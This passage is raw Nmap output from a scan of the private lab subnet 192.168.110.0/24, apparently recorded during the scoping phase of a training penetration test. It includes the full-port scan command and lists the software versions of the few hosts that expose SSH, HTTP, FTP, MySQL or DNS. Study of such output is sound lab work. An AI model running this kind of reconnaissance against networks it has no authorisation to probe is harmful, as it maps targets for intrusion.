PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.72
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.7.35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.73
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.120
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.135
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.250
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 19 09:56:49 2022 -- 256 IP addresses (256 hosts up) scanned in 396.74 seconds
sudo nmap -sV -T4 -Pn -p- 192.168.110.0/24 -oA Scoping/host_discovery/nmap/tcp_fullfastscan
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:51 CET
Nmap scan report for 192.168.110.0
Host is up.
All 65535 scanned ports on 192.168.110.0 are filtered
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00024s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
444/tcp open ssl/http Apache httpd
1013/tcp open http Apache httpd
Nmap scan report for 192.168.110.2
Host is up.
All 65535 scanned ports on 192.168.110.2 are filtered
Nmap scan report for 192.168.110.3
Host is up.
All 65535 scanned ports on 192.168.110.3 are filtered
Nmap scan report for 192.168.110.4
Host is up.
All 65535 scanned ports on 192.168.110.4 are filtered
Nmap scan report for 192.168.110.5
Host is up.
All 65535 scanned ports on 192.168.110.5 are filtered
Nmap scan report for 192.168.110.6
Host is up (1.7s latency).
All 65535 scanned ports on 192.168.110.6 are filtered
Nmap scan report for 192.168.110.7
Host is up.
All 65535 scanned ports on 192.168.110.7 are filtered
Nmap scan report for 192.168.110.8
Host is up.
All 65535 scanned ports on 192.168.110.8 are filtered
Nmap scan report for 192.168.110.9
Host is up.
All 65535 scanned ports on 192.168.110.9 are filtered
Nmap scan report for 192.168.110.10
Host is up.
All 65535 scanned ports on 192.168.110.10 are filtered
Nmap scan report for 192.168.110.11
Host is up.
All 65535 scanned ports on 192.168.110.11 are filtered
Nmap scan report for 192.168.110.12
Host is up.
All 65535 scanned ports on 192.168.110.12 are filtered
Nmap scan report for 192.168.110.13
Host is up.
All 65535 scanned ports on 192.168.110.13 are filtered
Nmap scan report for 192.168.110.14
Host is up.
All 65535 scanned ports on 192.168.110.14 are filtered
Nmap scan report for 192.168.110.15
Host is up.
All 65535 scanned ports on 192.168.110.15 are filtered
Nmap scan report for 192.168.110.16
Host is up.
All 65535 scanned ports on 192.168.110.16 are filtered
Nmap scan report for 192.168.110.17
Host is up.
All 65535 scanned ports on 192.168.110.17 are filtered
Nmap scan report for 192.168.110.18
Host is up.
All 65535 scanned ports on 192.168.110.18 are filtered
Nmap scan report for 192.168.110.19
Host is up.
All 65535 scanned ports on 192.168.110.19 are filtered
Nmap scan report for 192.168.110.20
Host is up.
All 65535 scanned ports on 192.168.110.20 are filtered
Nmap scan report for 192.168.110.21
Host is up.
All 65535 scanned ports on 192.168.110.21 are filtered
Nmap scan report for 192.168.110.22
Host is up.
All 65535 scanned ports on 192.168.110.22 are filtered
Nmap scan report for 192.168.110.23
Host is up.
All 65535 scanned ports on 192.168.110.23 are filtered
Nmap scan report for 192.168.110.24
Host is up.
All 65535 scanned ports on 192.168.110.24 are filtered
Nmap scan report for 192.168.110.25
Host is up.
All 65535 scanned ports on 192.168.110.25 are filtered
Nmap scan report for 192.168.110.26
Host is up.
All 65535 scanned ports on 192.168.110.26 are filtered
Nmap scan report for 192.168.110.27
Host is up.
All 65535 scanned ports on 192.168.110.27 are filtered
Nmap scan report for 192.168.110.28
Host is up.
All 65535 scanned ports on 192.168.110.28 are filtered
Nmap scan report for 192.168.110.29
Host is up.
All 65535 scanned ports on 192.168.110.29 are filtered
Nmap scan report for 192.168.110.30
Host is up (3.0s latency).
All 65535 scanned ports on 192.168.110.30 are filtered
Nmap scan report for 192.168.110.31
Host is up.
All 65535 scanned ports on 192.168.110.31 are filtered
Nmap scan report for 192.168.110.32
Host is up.
All 65535 scanned ports on 192.168.110.32 are filtered
Nmap scan report for 192.168.110.33
Host is up.
All 65535 scanned ports on 192.168.110.33 are filtered
Nmap scan report for 192.168.110.34
Host is up (3.1s latency).
All 65535 scanned ports on 192.168.110.34 are filtered
Nmap scan report for 192.168.110.35
Host is up.
All 65535 scanned ports on 192.168.110.35 are filtered
Nmap scan report for 192.168.110.36
Host is up.
All 65535 scanned ports on 192.168.110.36 are filtered
Nmap scan report for 192.168.110.37
Host is up.
All 65535 scanned ports on 192.168.110.37 are filtered
Nmap scan report for 192.168.110.38
Host is up.
All 65535 scanned ports on 192.168.110.38 are filtered
Nmap scan report for 192.168.110.39
Host is up.
All 65535 scanned ports on 192.168.110.39 are filtered
Nmap scan report for li212-vmKL.smartlearn.lan (192.168.110.40)
Host is up.
All 65535 scanned ports on li212-vmKL.smartlearn.lan (192.168.110.40) are filtered
Nmap scan report for 192.168.110.41
Host is up.
All 65535 scanned ports on 192.168.110.41 are filtered
Nmap scan report for 192.168.110.42
Host is up.
All 65535 scanned ports on 192.168.110.42 are filtered
Nmap scan report for 192.168.110.43
Host is up.
All 65535 scanned ports on 192.168.110.43 are filtered
Nmap scan report for 192.168.110.44
Host is up.
All 65535 scanned ports on 192.168.110.44 are filtered
Nmap scan report for 192.168.110.45
Host is up.
All 65535 scanned ports on 192.168.110.45 are filtered
Nmap scan report for 192.168.110.46
Host is up.
All 65535 scanned ports on 192.168.110.46 are filtered
Nmap scan report for 192.168.110.47
Host is up.
All 65535 scanned ports on 192.168.110.47 are filtered
Nmap scan report for 192.168.110.48
Host is up (3.0s latency).
All 65535 scanned ports on 192.168.110.48 are filtered
Nmap scan report for 192.168.110.49
Host is up.
All 65535 scanned ports on 192.168.110.49 are filtered
Nmap scan report for 192.168.110.50
Host is up.
All 65535 scanned ports on 192.168.110.50 are filtered
Nmap scan report for 192.168.110.51
Host is up.
All 65535 scanned ports on 192.168.110.51 are filtered
Nmap scan report for 192.168.110.52
Host is up.
All 65535 scanned ports on 192.168.110.52 are filtered
Nmap scan report for 192.168.110.53
Host is up.
All 65535 scanned ports on 192.168.110.53 are filtered
Nmap scan report for 192.168.110.54
Host is up.
All 65535 scanned ports on 192.168.110.54 are filtered
Nmap scan report for 192.168.110.55
Host is up.
All 65535 scanned ports on 192.168.110.55 are filtered
Nmap scan report for 192.168.110.56
Host is up.
All 65535 scanned ports on 192.168.110.56 are filtered
Nmap scan report for 192.168.110.57
Host is up.
All 65535 scanned ports on 192.168.110.57 are filtered
Nmap scan report for 192.168.110.58
Host is up.
All 65535 scanned ports on 192.168.110.58 are filtered
Nmap scan report for 192.168.110.59
Host is up.
All 65535 scanned ports on 192.168.110.59 are filtered
Nmap scan report for 192.168.110.60
Host is up (0.00043s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.61
Host is up.
All 65535 scanned ports on 192.168.110.61 are filtered
Nmap scan report for 192.168.110.62
Host is up.
All 65535 scanned ports on 192.168.110.62 are filtered
Nmap scan report for 192.168.110.63
Host is up.
All 65535 scanned ports on 192.168.110.63 are filtered
Nmap scan report for 192.168.110.64
Host is up.
All 65535 scanned ports on 192.168.110.64 are filtered
Nmap scan report for 192.168.110.65
Host is up.
All 65535 scanned ports on 192.168.110.65 are filtered
Nmap scan report for 192.168.110.66
Host is up.
All 65535 scanned ports on 192.168.110.66 are filtered
Nmap scan report for 192.168.110.67
Host is up.
All 65535 scanned ports on 192.168.110.67 are filtered
Nmap scan report for 192.168.110.68
Host is up.
All 65535 scanned ports on 192.168.110.68 are filtered
Nmap scan report for 192.168.110.69
Host is up.
All 65535 scanned ports on 192.168.110.69 are filtered
Nmap scan report for 192.168.110.70
Host is up.
All 65535 scanned ports on 192.168.110.70 are filtered
Nmap scan report for 192.168.110.71
Host is up.
All 65535 scanned ports on 192.168.110.71 are filtered
Nmap scan report for 192.168.110.72
Host is up (0.0035s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.7.35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.73
Host is up (0.00047s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.74
Host is up.
All 65535 scanned ports on 192.168.110.74 are filtered
Nmap scan report for 192.168.110.75
Host is up.
All 65535 scanned ports on 192.168.110.75 are filtered
Nmap scan report for 192.168.110.76
Host is up.
All 65535 scanned ports on 192.168.110.76 are filtered
Nmap scan report for 192.168.110.77
Host is up.
All 65535 scanned ports on 192.168.110.77 are filtered
Nmap scan report for 192.168.110.78
Host is up.
All 65535 scanned ports on 192.168.110.78 are filtered
Nmap scan report for 192.168.110.79
Host is up.
All 65535 scanned ports on 192.168.110.79 are filtered
Nmap scan report for 192.168.110.80
Host is up (0.00072s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.81
Host is up.
All 65535 scanned ports on 192.168.110.81 are filtered
Nmap scan report for 192.168.110.82
Host is up.
All 65535 scanned ports on 192.168.110.82 are filtered
Nmap scan report for 192.168.110.83
Host is up.
All 65535 scanned ports on 192.168.110.83 are filtered
Nmap scan report for 192.168.110.84
Host is up.
All 65535 scanned ports on 192.168.110.84 are filtered
Nmap scan report for 192.168.110.85
Host is up.
All 65535 scanned ports on 192.168.110.85 are filtered
Nmap scan report for 192.168.110.86
Host is up.
All 65535 scanned ports on 192.168.110.86 are filtered
Nmap scan report for 192.168.110.87
Host is up.
All 65535 scanned ports on 192.168.110.87 are filtered
Nmap scan report for 192.168.110.88
Host is up.
All 65535 scanned ports on 192.168.110.88 are filtered
Nmap scan report for 192.168.110.89
Host is up.
All 65535 scanned ports on 192.168.110.89 are filtered
Nmap scan report for 192.168.110.90
Host is up.
All 65535 scanned ports on 192.168.110.90 are filtered
Nmap scan report for 192.168.110.91
Host is up.
All 65535 scanned ports on 192.168.110.91 are filtered
Nmap scan report for 192.168.110.92
Host is up.
All 65535 scanned ports on 192.168.110.92 are filtered
Nmap scan report for 192.168.110.93
Host is up.
All 65535 scanned ports on 192.168.110.93 are filtered
Nmap scan report for 192.168.110.94
Host is up.
All 65535 scanned ports on 192.168.110.94 are filtered
Nmap scan report for 192.168.110.95
Host is up.
All 65535 scanned ports on 192.168.110.95 are filtered
Nmap scan report for 192.168.110.96
Host is up.
All 65535 scanned ports on 192.168.110.96 are filtered
Nmap scan report for 192.168.110.97
Host is up.
All 65535 scanned ports on 192.168.110.97 are filtered
Nmap scan report for 192.168.110.98
Host is up.
All 65535 scanned ports on 192.168.110.98 are filtered
Nmap scan report for 192.168.110.99
Host is up.
All 65535 scanned ports on 192.168.110.99 are filtered
Nmap scan report for 192.168.110.100
Host is up.
All 65535 scanned ports on 192.168.110.100 are filtered
Nmap scan report for 192.168.110.101
Host is up.
All 65535 scanned ports on 192.168.110.101 are filtered
Nmap scan report for 192.168.110.102
Host is up.
All 65535 scanned ports on 192.168.110.102 are filtered
Nmap scan report for 192.168.110.103
Host is up.
All 65535 scanned ports on 192.168.110.103 are filtered
Nmap scan report for 192.168.110.104
Host is up.
All 65535 scanned ports on 192.168.110.104 are filtered
Nmap scan report for 192.168.110.105
Host is up.
All 65535 scanned ports on 192.168.110.105 are filtered
Nmap scan report for 192.168.110.106
Host is up.
All 65535 scanned ports on 192.168.110.106 are filtered
Nmap scan report for 192.168.110.107
Host is up.
All 65535 scanned ports on 192.168.110.107 are filtered
Nmap scan report for 192.168.110.108
Host is up.
All 65535 scanned ports on 192.168.110.108 are filtered
Nmap scan report for 192.168.110.109
Host is up.
All 65535 scanned ports on 192.168.110.109 are filtered
Nmap scan report for 192.168.110.110
Host is up.
All 65535 scanned ports on 192.168.110.110 are filtered
Nmap scan report for 192.168.110.111
Host is up.
All 65535 scanned ports on 192.168.110.111 are filtered
Nmap scan report for 192.168.110.112
Host is up.
All 65535 scanned ports on 192.168.110.112 are filtered
Nmap scan report for 192.168.110.113
Host is up.
All 65535 scanned ports on 192.168.110.113 are filtered
Nmap scan report for 192.168.110.114
Host is up.
All 65535 scanned ports on 192.168.110.114 are filtered
Nmap scan report for 192.168.110.115
Host is up.
All 65535 scanned ports on 192.168.110.115 are filtered
Nmap scan report for 192.168.110.116
Host is up.
All 65535 scanned ports on 192.168.110.116 are filtered
Nmap scan report for 192.168.110.117
Host is up.
All 65535 scanned ports on 192.168.110.117 are filtered
Nmap scan report for 192.168.110.118
Host is up.
All 65535 scanned ports on 192.168.110.118 are filtered
Nmap scan report for 192.168.110.119
Host is up.
All 65535 scanned ports on 192.168.110.119 are filtered
Nmap scan report for 192.168.110.120
Host is up (0.0048s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
20021/tcp open ftp vsftpd 3.0.3
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.121
Host is up.
All 65535 scanned ports on 192.168.110.121 are filtered
Nmap scan report for 192.168.110.122
Host is up.
All 65535 scanned ports on 192.168.110.122 are filtered
Nmap scan report for 192.168.110.123
Host is up.
All 65535 scanned ports on 192.168.110.123 are filtered
Nmap scan report for 192.168.110.124
Host is up.
All 65535 scanned ports on 192.168.110.124 are filtered
Nmap scan report for 192.168.110.125
Host is up.
All 65535 scanned ports on 192.168.110.125 are filtered
Nmap scan report for 192.168.110.126
Host is up.
All 65535 scanned ports on 192.168.110.126 are filtered
Nmap scan report for 192.168.110.127
Host is up.
All 65535 scanned ports on 192.168.110.127 are filtered
Nmap scan report for 192.168.110.128
Host is up.
All 65535 scanned ports on 192.168.110.128 are filtered
Nmap scan report for 192.168.110.129
Host is up.
All 65535 scanned ports on 192.168.110.129 are filtered
Nmap scan report for 192.168.110.130
Host is up.
All 65535 scanned ports on 192.168.110.130 are filtered
Nmap scan report for 192.168.110.131
Host is up.
All 65535 scanned ports on 192.168.110.131 are filtered
Nmap scan report for 192.168.110.132
Host is up.
All 65535 scanned ports on 192.168.110.132 are filtered
Nmap scan report for 192.168.110.133
Host is up.
All 65535 scanned ports on 192.168.110.133 are filtered
Nmap scan report for 192.168.110.134
Host is up.
All 65535 scanned ports on 192.168.110.134 are filtered
Nmap scan report for 192.168.110.135
Host is up (0.00078s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.136
Host is up.
All 65535 scanned ports on 192.168.110.136 are filtered
Nmap scan report for 192.168.110.137
Host is up.
All 65535 scanned ports on 192.168.110.137 are filtered
Nmap scan report for 192.168.110.138
Host is up.
All 65535 scanned ports on 192.168.110.138 are filtered
Nmap scan report for 192.168.110.139
Host is up.
All 65535 scanned ports on 192.168.110.139 are filtered
Nmap scan report for 192.168.110.140
Host is up.
All 65535 scanned ports on 192.168.110.140 are filtered
Nmap scan report for 192.168.110.141
Host is up.
All 65535 scanned ports on 192.168.110.141 are filtered
Nmap scan report for 192.168.110.142
Host is up.
All 65535 scanned ports on 192.168.110.142 are filtered
Nmap scan report for 192.168.110.143
Host is up.
All 65535 scanned ports on 192.168.110.143 are filtered
Nmap scan report for 192.168.110.144
Host is up.
All 65535 scanned ports on 192.168.110.144 are filtered
Nmap scan report for 192.168.110.145
Host is up.
All 65535 scanned ports on 192.168.110.145 are filtered
Nmap scan report for 192.168.110.146
Host is up.
All 65535 scanned ports on 192.168.110.146 are filtered
Nmap scan report for 192.168.110.147
Host is up.
All 65535 scanned ports on 192.168.110.147 are filtered
Nmap scan report for 192.168.110.148
Host is up.
All 65535 scanned ports on 192.168.110.148 are filtered
Nmap scan report for 192.168.110.149
Host is up.
All 65535 scanned ports on 192.168.110.149 are filtered
Nmap scan report for 192.168.110.150
Host is up.
All 65535 scanned ports on 192.168.110.150 are filtered
Nmap scan report for 192.168.110.151
Host is up.
All 65535 scanned ports on 192.168.110.151 are filtered
Nmap scan report for 192.168.110.152
Host is up.
All 65535 scanned ports on 192.168.110.152 are filtered
Nmap scan report for 192.168.110.153
Host is up.
All 65535 scanned ports on 192.168.110.153 are filtered
Nmap scan report for 192.168.110.154
Host is up.
All 65535 scanned ports on 192.168.110.154 are filtered
Nmap scan report for 192.168.110.155
Host is up.
All 65535 scanned ports on 192.168.110.155 are filtered
Nmap scan report for 192.168.110.156
Host is up.
All 65535 scanned ports on 192.168.110.156 are filtered
Nmap scan report for 192.168.110.157
Host is up.
All 65535 scanned ports on 192.168.110.157 are filtered
Nmap scan report for 192.168.110.158
Host is up (3.0s latency).
All 65535 scanned ports on 192.168.110.158 are filtered
Nmap scan report for 192.168.110.159
Host is up.
All 65535 scanned ports on 192.168.110.159 are filtered
Nmap scan report for 192.168.110.160
Host is up.
All 65535 scanned ports on 192.168.110.160 are filtered
Nmap scan report for 192.168.110.161
Host is up.
All 65535 scanned ports on 192.168.110.161 are filtered
Nmap scan report for 192.168.110.162
Host is up.
All 65535 scanned ports on 192.168.110.162 are filtered
Nmap scan report for 192.168.110.163
Host is up.
All 65535 scanned ports on 192.168.110.163 are filtered
Nmap scan report for 192.168.110.164
Host is up.
All 65535 scanned ports on 192.168.110.164 are filtered
Nmap scan report for 192.168.110.165
Host is up.
All 65535 scanned ports on 192.168.110.165 are filtered
Nmap scan report for 192.168.110.166
Host is up.
All 65535 scanned ports on 192.168.110.166 are filtered
Nmap scan report for 192.168.110.167
Host is up.
All 65535 scanned ports on 192.168.110.167 are filtered
Nmap scan report for 192.168.110.168
Host is up.
All 65535 scanned ports on 192.168.110.168 are filtered
Nmap scan report for 192.168.110.169
Host is up.
All 65535 scanned ports on 192.168.110.169 are filtered
Nmap scan report for 192.168.110.170
Host is up.
All 65535 scanned ports on 192.168.110.170 are filtered
Nmap scan report for 192.168.110.171
Host is up.
All 65535 scanned ports on 192.168.110.171 are filtered
Nmap scan report for 192.168.110.172
Host is up.
All 65535 scanned ports on 192.168.110.172 are filtered
Nmap scan report for 192.168.110.173
Host is up.
All 65535 scanned ports on 192.168.110.173 are filtered
Nmap scan report for 192.168.110.174
Host is up.
All 65535 scanned ports on 192.168.110.174 are filtered
Nmap scan report for 192.168.110.175
Host is up.
All 65535 scanned ports on 192.168.110.175 are filtered
Nmap scan report for 192.168.110.176
Host is up.
All 65535 scanned ports on 192.168.110.176 are filtered
Nmap scan report for 192.168.110.177
Host is up.
All 65535 scanned ports on 192.168.110.177 are filtered
Nmap scan report for 192.168.110.178
Host is up.
All 65535 scanned ports on 192.168.110.178 are filtered
Nmap scan report for 192.168.110.179
Host is up.
All 65535 scanned ports on 192.168.110.179 are filtered
Nmap scan report for 192.168.110.180
Host is up.
All 65535 scanned ports on 192.168.110.180 are filtered
Nmap scan report for 192.168.110.181
Host is up.
All 65535 scanned ports on 192.168.110.181 are filtered
Nmap scan report for 192.168.110.182
Host is up.
All 65535 scanned ports on 192.168.110.182 are filtered
Nmap scan report for 192.168.110.183
Host is up.
All 65535 scanned ports on 192.168.110.183 are filtered
Nmap scan report for 192.168.110.184
Host is up.
All 65535 scanned ports on 192.168.110.184 are filtered
Nmap scan report for 192.168.110.185
Host is up.
All 65535 scanned ports on 192.168.110.185 are filtered
Nmap scan report for 192.168.110.186
Host is up.
All 65535 scanned ports on 192.168.110.186 are filtered
Nmap scan report for 192.168.110.187
Host is up.
All 65535 scanned ports on 192.168.110.187 are filtered
Nmap scan report for 192.168.110.188
Host is up.
All 65535 scanned ports on 192.168.110.188 are filtered
Nmap scan report for 192.168.110.189
Host is up.
All 65535 scanned ports on 192.168.110.189 are filtered
Nmap scan report for 192.168.110.190
Host is up.
All 65535 scanned ports on 192.168.110.190 are filtered
Nmap scan report for 192.168.110.191
Host is up.
All 65535 scanned ports on 192.168.110.191 are filtered
Nmap scan report for 192.168.110.192
Host is up.
All 65535 scanned ports on 192.168.110.192 are filtered
Nmap scan report for 192.168.110.193
Host is up.
All 65535 scanned ports on 192.168.110.193 are filtered
Nmap scan report for 192.168.110.194
Host is up.
All 65535 scanned ports on 192.168.110.194 are filtered
Nmap scan report for 192.168.110.195
Host is up.
All 65535 scanned ports on 192.168.110.195 are filtered
Nmap scan report for 192.168.110.196
Host is up.
All 65535 scanned ports on 192.168.110.196 are filtered
Nmap scan report for 192.168.110.197
Host is up.
All 65535 scanned ports on 192.168.110.197 are filtered
Nmap scan report for 192.168.110.198
Host is up.
All 65535 scanned ports on 192.168.110.198 are filtered
Nmap scan report for 192.168.110.199
Host is up.
All 65535 scanned ports on 192.168.110.199 are filtered
Nmap scan report for 192.168.110.200
Host is up.
All 65535 scanned ports on 192.168.110.200 are filtered
Nmap scan report for 192.168.110.201
Host is up.
All 65535 scanned ports on 192.168.110.201 are filtered
Nmap scan report for 192.168.110.202
Host is up.
All 65535 scanned ports on 192.168.110.202 are filtered
Nmap scan report for 192.168.110.203
Host is up.
All 65535 scanned ports on 192.168.110.203 are filtered
Nmap scan report for 192.168.110.204
Host is up.
All 65535 scanned ports on 192.168.110.204 are filtered
Nmap scan report for 192.168.110.205
Host is up.
All 65535 scanned ports on 192.168.110.205 are filtered
Nmap scan report for 192.168.110.206
Host is up.
All 65535 scanned ports on 192.168.110.206 are filtered
Nmap scan report for 192.168.110.207
Host is up.
All 65535 scanned ports on 192.168.110.207 are filtered
Nmap scan report for 192.168.110.208
Host is up.
All 65535 scanned ports on 192.168.110.208 are filtered
Nmap scan report for 192.168.110.209
Host is up.
All 65535 scanned ports on 192.168.110.209 are filtered
Nmap scan report for 192.168.110.210
Host is up.
All 65535 scanned ports on 192.168.110.210 are filtered
Nmap scan report for 192.168.110.211
Host is up.
All 65535 scanned ports on 192.168.110.211 are filtered
Nmap scan report for 192.168.110.212
Host is up.
All 65535 scanned ports on 192.168.110.212 are filtered
Nmap scan report for 192.168.110.213
Host is up.
All 65535 scanned ports on 192.168.110.213 are filtered
Nmap scan report for 192.168.110.214
Host is up.
All 65535 scanned ports on 192.168.110.214 are filtered
Nmap scan report for 192.168.110.215
Host is up.
All 65535 scanned ports on 192.168.110.215 are filtered
Nmap scan report for 192.168.110.216
Host is up.
All 65535 scanned ports on 192.168.110.216 are filtered
Nmap scan report for 192.168.110.217
Host is up.
All 65535 scanned ports on 192.168.110.217 are filtered
Nmap scan report for 192.168.110.218
Host is up.
All 65535 scanned ports on 192.168.110.218 are filtered
Nmap scan report for 192.168.110.219
Host is up.
All 65535 scanned ports on 192.168.110.219 are filtered
Nmap scan report for 192.168.110.220
Host is up.
All 65535 scanned ports on 192.168.110.220 are filtered
Nmap scan report for 192.168.110.221
Host is up.
All 65535 scanned ports on 192.168.110.221 are filtered
Nmap scan report for 192.168.110.222
Host is up.
All 65535 scanned ports on 192.168.110.222 are filtered
Nmap scan report for 192.168.110.223
Host is up.
All 65535 scanned ports on 192.168.110.223 are filtered
Nmap scan report for 192.168.110.224
Host is up.
All 65535 scanned ports on 192.168.110.224 are filtered
Nmap scan report for 192.168.110.225
Host is up.
All 65535 scanned ports on 192.168.110.225 are filtered
Nmap scan report for 192.168.110.226
Host is up.
All 65535 scanned ports on 192.168.110.226 are filtered
Nmap scan report for 192.168.110.227
Host is up.
All 65535 scanned ports on 192.168.110.227 are filtered
Nmap scan report for 192.168.110.228
Host is up.
All 65535 scanned ports on 192.168.110.228 are filtered
Nmap scan report for 192.168.110.229
Host is up.
All 65535 scanned ports on 192.168.110.229 are filtered
Nmap scan report for 192.168.110.230
Host is up.
All 65535 scanned ports on 192.168.110.230 are filtered
Nmap scan report for 192.168.110.231
Host is up.
All 65535 scanned ports on 192.168.110.231 are filtered
Nmap scan report for 192.168.110.232
Host is up.
All 65535 scanned ports on 192.168.110.232 are filtered
Nmap scan report for 192.168.110.233
Host is up.
All 65535 scanned ports on 192.168.110.233 are filtered
Nmap scan report for 192.168.110.234
Host is up.
All 65535 scanned ports on 192.168.110.234 are filtered
Nmap scan report for 192.168.110.235
Host is up.
All 65535 scanned ports on 192.168.110.235 are filtered
Nmap scan report for 192.168.110.236
Host is up.
All 65535 scanned ports on 192.168.110.236 are filtered
Nmap scan report for 192.168.110.237
Host is up.
All 65535 scanned ports on 192.168.110.237 are filtered
Nmap scan report for 192.168.110.238
Host is up.
All 65535 scanned ports on 192.168.110.238 are filtered
Nmap scan report for 192.168.110.239
Host is up (3.0s latency).
All 65535 scanned ports on 192.168.110.239 are filtered
Nmap scan report for 192.168.110.240
Host is up.
All 65535 scanned ports on 192.168.110.240 are filtered
Nmap scan report for 192.168.110.241
Host is up (1.1s latency).
All 65535 scanned ports on 192.168.110.241 are filtered
Nmap scan report for 192.168.110.242
Host is up.
All 65535 scanned ports on 192.168.110.242 are filtered
Nmap scan report for 192.168.110.243
Host is up.
All 65535 scanned ports on 192.168.110.243 are filtered
Nmap scan report for 192.168.110.244
Host is up (2.0s latency).
All 65535 scanned ports on 192.168.110.244 are filtered
Nmap scan report for 192.168.110.245
Host is up.
All 65535 scanned ports on 192.168.110.245 are filtered
Nmap scan report for 192.168.110.246
Host is up.
All 65535 scanned ports on 192.168.110.246 are filtered
Nmap scan report for 192.168.110.247
Host is up.
All 65535 scanned ports on 192.168.110.247 are filtered
Nmap scan report for 192.168.110.248
Host is up (0.92s latency).
All 65535 scanned ports on 192.168.110.248 are filtered
Nmap scan report for 192.168.110.249
Host is up.
All 65535 scanned ports on 192.168.110.249 are filtered
Nmap scan report for 192.168.110.250
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.251
Host is up.
All 65535 scanned ports on 192.168.110.251 are filtered
Nmap scan report for 192.168.110.252
